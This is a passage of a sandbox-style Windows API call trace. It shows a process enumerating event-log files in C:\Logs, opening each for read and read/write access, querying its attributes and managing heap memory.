InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0086.762] AreFileApisANSI () returned 1 [0086.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx", lpUsedDefaultChar=0x0) returned 56 [0086.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0086.763] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.763] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0086.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0086.763] AreFileApisANSI () returned 1 [0086.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0086.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 56 [0086.763] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.763] GetFileType (hFile=0x348) returned 0x1 [0086.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.763] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.763] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.764] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.764] CloseHandle (hObject=0x348) returned 1 [0086.764] AreFileApisANSI () returned 1 [0086.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0086.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0086.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x75eb8, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 56 [0086.764] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.764] GetFileType (hFile=0x348) returned 0x1 [0086.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0086.764] CloseHandle (hObject=0x348) returned 1 [0086.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0086.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0086.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0086.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0086.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0086.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0086.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0086.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0086.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0086.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0086.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0086.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0086.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0086.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0086.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0086.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0086.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0086.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0086.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0086.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0086.765] AreFileApisANSI () returned 1 [0086.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0086.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 56 [0086.765] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9658ef3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9658ef3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0086.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0086.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0086.766] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.766] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.766] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9dcc480, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9dcc480, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-HotspotAuth%4Operational.evtx", cAlternateFileName="MIE386~1.EVT")) returned 1 [0086.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0086.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0086.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0086.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0086.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0086.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0086.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0086.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0086.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0086.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0086.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0086.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0086.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0086.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0086.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0086.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0086.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0086.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0086.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0086.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0086.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0086.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.766] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.766] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0086.767] AreFileApisANSI () returned 1 [0086.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx", lpUsedDefaultChar=0x0) returned 56 [0086.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0086.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0086.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0086.767] AreFileApisANSI () returned 1 [0086.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0086.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0086.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 56 [0086.767] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.767] GetFileType (hFile=0x348) returned 0x1 [0086.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0086.768] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.768] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.768] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.768] CloseHandle (hObject=0x348) returned 1 [0086.768] AreFileApisANSI () returned 1 [0086.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0086.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 56 [0086.768] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.768] GetFileType (hFile=0x348) returned 0x1 [0086.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.769] CloseHandle (hObject=0x348) returned 1 [0086.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0086.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0086.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0086.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0086.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0086.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0086.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0086.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0086.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0086.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0086.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0086.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0086.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0086.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0086.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0086.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0086.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0086.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0086.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0086.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0086.769] AreFileApisANSI () returned 1 [0086.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0086.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x76098, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 56 [0086.769] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9dcc480, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9dcc480, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0086.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0086.770] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.770] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.770] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b4bacf, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b4bacf, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", cAlternateFileName="MI6B25~1.EVT")) returned 1 [0086.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0086.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0086.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0086.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68c70 [0086.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0086.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0086.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68c70 | out: hHeap=0x20000) returned 1 [0086.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0086.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0086.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0086.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0086.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0086.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0086.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0086.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0086.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0086.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0086.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0086.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0086.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0086.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.771] AreFileApisANSI () returned 1 [0086.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", lpUsedDefaultChar=0x0) returned 60 [0086.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0086.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.771] InitOnceExecuteOnce (in: 